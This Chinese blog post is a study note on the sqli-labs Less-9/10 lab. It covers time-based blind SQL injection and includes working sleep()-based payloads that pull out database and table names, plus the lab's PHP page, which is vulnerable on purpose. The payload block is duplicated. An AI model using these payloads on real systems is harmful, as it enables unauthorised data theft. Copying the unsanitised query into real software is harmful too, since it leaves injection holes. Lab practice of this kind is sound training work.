Less-9&10基于时间的盲注
来源:互联网 发布:艾泰 网络尖兵防御 编辑:程序博客网 时间:2024/05/16 06:46
基于时间的盲注
sleep()将执行程序挂起一段时间
if(参数1,参数2,参数3)1正确执行2,错误执行3;
select sleep(3);
select if(database()='security',1,2);
select if(database()='security',sleep(5),NULL)name;
select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=100,sleep(5),NULL)name;
select * from table where id = input
1 and select sleep(5)--+;
select * from table where id = 'input'
1' and select sleep(5) --+;
(select if(ascii(substr(database(),1,1))>100,sleep(5),NULL))--+
1' and (select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),NULL)name)--+
=》》
可得到结果
sleep()将执行程序挂起一段时间
if(参数1,参数2,参数3)1正确执行2,错误执行3;
select sleep(3);
select if(database()='security',1,2);
select if(database()='security',sleep(5),NULL)name;
select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=100,sleep(5),NULL)name;
select * from table where id = input
1 and select sleep(5)--+;
select * from table where id = 'input'
1' and select sleep(5) --+;
(select if(ascii(substr(database(),1,1))>100,sleep(5),NULL))--+
1' and (select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),NULL)name)--+
=》》
可得到结果
<?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);// connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo '<font size="5" color="#FFFF00">'; echo 'You are in...........'; echo "<br>"; echo "</font>"; }else {echo '<font size="5" color="#FFFF00">';echo 'You are in...........';//print_r(mysql_error());//echo "You have an error in your SQL syntax";echo "</br></font>";echo '<font color= "#0000ff" font size= 3>';}}else { echo "Please input the ID as parameter with numeric value";}?>
0 0
- Less-9&10基于时间的盲注
- 基于Nodejs+Less的动态CSS
- sqli-labs ---- Less-8 & Less-9 & Less-10
- sqli-labs ---- Less-8 & Less-9 & Less-10
- sql注入基于布尔/时间的盲注详解
- SQLI-LAB 的 实战记录(Less 1 - Less 10)
- CSS3 Animation 基于 less 构建的 css3 动画库
- 基于 less 构建的 css3 动画库-88种
- 构建基于 NodeJS 的 LESS.js 预编译 CSS 服务
- sqlmap基于时间盲注判断原理
- LESS CSS 常用的10个实例
- 基于AttenceTimelineCell的时间轴
- 基于时间的动画算
- 浅谈盲注中的基于时间型和布尔型的注入方法
- LESS学习:LESS的基础语法
- 2.1 基于NBear.Data的实体持久化[发布时间:9/10]
- 强大的less
- linux的less命令
- 润乾报表V5.0授权更新替换操作说明
- 4.26
- 索引2
- 视图
- session概述
- Less-9&10基于时间的盲注
- 使用 Oracle的存储过程实现数据加密和解密
- BZOJ4827: [Hnoi2017]礼物
- QT TCP服务端如何判断客户端已断开连接
- 好文章链接汇总
- LeetCode 46. Permutations47. Permutations II&&131. Palindrome Partitioning(全排列问题)
- 开源 java CMS
- mecanim动画系统-stoneKing
- hwclock源码分析